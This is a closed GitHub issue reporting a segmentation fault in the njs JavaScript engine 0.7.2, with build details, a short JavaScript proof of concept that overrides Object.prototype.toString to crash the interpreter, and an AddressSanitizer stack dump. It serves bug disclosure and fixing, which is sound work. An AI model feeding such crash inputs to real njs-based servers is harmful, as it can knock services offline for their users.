Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SEGV njs_lvlhsh.c:231:17 in njs_lvlhsh_bucket_find #467

Closed
Q1IQ opened this issue Feb 15, 2022 · 0 comments
Closed

SEGV njs_lvlhsh.c:231:17 in njs_lvlhsh_bucket_find #467

Q1IQ opened this issue Feb 15, 2022 · 0 comments
Assignees

Comments

@Q1IQ
Copy link

Q1IQ commented Feb 15, 2022

Environment

OS      : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit  : 7bd570b39297d3d91902c93a624c89b08be7a6fe
Version : 0.7.2
Build   : 
          NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
          NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"

Proof of concept

function f2(v) {
    Object.prototype.toString = v;
}

Object.prototype.toString = f2;

function f() {
    "includes"[{}]();
}

new Promise(f);
String.fromCharCode(0,parseInt);

Stack dump

AddressSanitizer:DEADLYSIGNAL
=================================================================
==2064577==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004cac48 bp 0x7ffcc1edfbf0 sp 0x7ffcc1edfbb0 T0)
==2064577==The signal is caused by a READ memory access.
==2064577==Hint: this fault was caused by a dereference of a high value address (see register values below).  Dissassemble the provided pc to learn which register was used.
    #0 0x4cac48 in njs_lvlhsh_bucket_find /home/q1iq/Documents/origin/njs/src/njs_lvlhsh.c:231:17
    #1 0x4cac48 in njs_lvlhsh_find /home/q1iq/Documents/origin/njs/src/njs_lvlhsh.c:181:20
    #2 0x516c4f in njs_object_property /home/q1iq/Documents/origin/njs/src/njs_object_prop.c:59:15
    #3 0x4d5963 in njs_value_to_primitive /home/q1iq/Documents/origin/njs/src/njs_value.c:159:19
    #4 0x4fb3ab in njs_value_to_number /home/q1iq/Documents/origin/njs/src/njs_value_conversion.h:18:15
    #5 0x4fb3ab in njs_value_to_numeric /home/q1iq/Documents/origin/njs/src/njs_value_conversion.h:54:11
    #6 0x4fb3ab in njs_string_from_char_code /home/q1iq/Documents/origin/njs/src/njs_string.c:2036:19
    #7 0x53bf9c in njs_function_native_call /home/q1iq/Documents/origin/njs/src/njs_function.c:739:11
    #8 0x4e47fa in njs_vmcode_interpreter /home/q1iq/Documents/origin/njs/src/njs_vmcode.c:785:23
    #9 0x53b43a in njs_function_lambda_call /home/q1iq/Documents/origin/njs/src/njs_function.c:703:11
    #10 0x4e47fa in njs_vmcode_interpreter /home/q1iq/Documents/origin/njs/src/njs_vmcode.c:785:23
    #11 0x4deb7b in njs_vm_start /home/q1iq/Documents/origin/njs/src/njs_vm.c:493:11
    #12 0x4c8099 in njs_process_script /home/q1iq/Documents/origin/njs/src/njs_shell.c:903:19
    #13 0x4c7484 in njs_process_file /home/q1iq/Documents/origin/njs/src/njs_shell.c:632:11
    #14 0x4c7484 in main /home/q1iq/Documents/origin/njs/src/njs_shell.c:316:15
    #15 0x7f4beb9e10b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #16 0x41dabd in _start (/home/q1iq/Documents/origin/njs/build/njs+0x41dabd)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/q1iq/Documents/origin/njs/src/njs_lvlhsh.c:231:17 in njs_lvlhsh_bucket_find
==2064577==ABORTING

Credit

Q1IQ(@Q1IQ)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants